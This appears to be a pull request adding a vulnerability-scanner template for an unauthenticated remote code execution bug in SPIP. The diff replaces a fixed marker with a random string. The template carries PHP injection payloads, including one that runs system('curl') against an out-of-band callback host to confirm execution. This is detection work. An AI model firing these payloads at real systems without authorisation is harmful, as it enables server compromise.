### PR TITLE
Add CVE-2025-71243 for unauthenticated RCE in SPIP

### DIFF
--- a/http/cves/2025/CVE-2025-71243.yaml
+++ b/http/cves/2025/CVE-2025-71243.yaml
@@ -28,7 +28,7 @@ info:
   tags: cve,cve2025,spip,rce,unauth,oast,interactsh
 
 variables:
-  rce_payload: "x'/><?php echo 'VT2025SPIPSAISIES'; ?><input value='x"
+  rce_payload: "x'/><?php echo '{{randstr}}'; ?><input value='x"
   oob_payload: "x'/><?php gethostbyname('{{interactsh-url}}'); ?><input value='x"
   oob_curl: "x'/><?php system('curl+-s+{{interactsh-url}}'); ?><input value='x"
 
@@ -54,7 +54,7 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - 'contains(body, "VT2025SPIPSAISIES")'
+          - 'contains(body, "{{randstr}}")'
           - 'status_code == 200'
         condition: and
 


### PR DESCRIPTION
### PR Information
 
-   Added CVE-2025-71243
- References: https://vulnerabletarget.com/VT-2025-71243

 ---

<img width="1063" height="202" alt="image" src="https://github.com/user-attachments/assets/a9925a73-d2bd-46d0-8deb-5b66a3075adc" />

